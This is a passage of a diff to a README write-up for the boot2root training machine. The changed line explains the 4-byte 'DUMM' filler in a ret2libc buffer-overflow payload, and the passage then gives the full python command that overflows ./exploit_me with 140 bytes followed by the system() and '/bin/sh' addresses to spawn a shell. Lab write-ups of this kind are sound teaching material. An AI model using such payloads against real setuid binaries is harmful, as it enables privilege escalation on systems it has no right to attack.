iljaSL/boot2root/README.md

 0xb7f8cc58 -> 58CCF8B7
 ```

-The `DUMM` string between those two address is there because of the system architecture of b2r, which requires to have some dummy data between the `system()` and `/bin/sh` call.
+The `DUMM` string between those two address is there because of the system architecture of b2r, which requires to have some dummy data as an offset of 4 bytes between the `system()` and `/bin/sh` call, which will also essential be the pointer to the `/bin/sh` string.
 The payload is ready, let's execute is outside of the gdb:
 ```
 zaz@BornToSecHackMe:~$ ./exploit_me `python -c 'print "A"*140+"\x60\xb0\xe6\xb7"+"DUMM"+"\x58\xcc\xf8\xb7"'`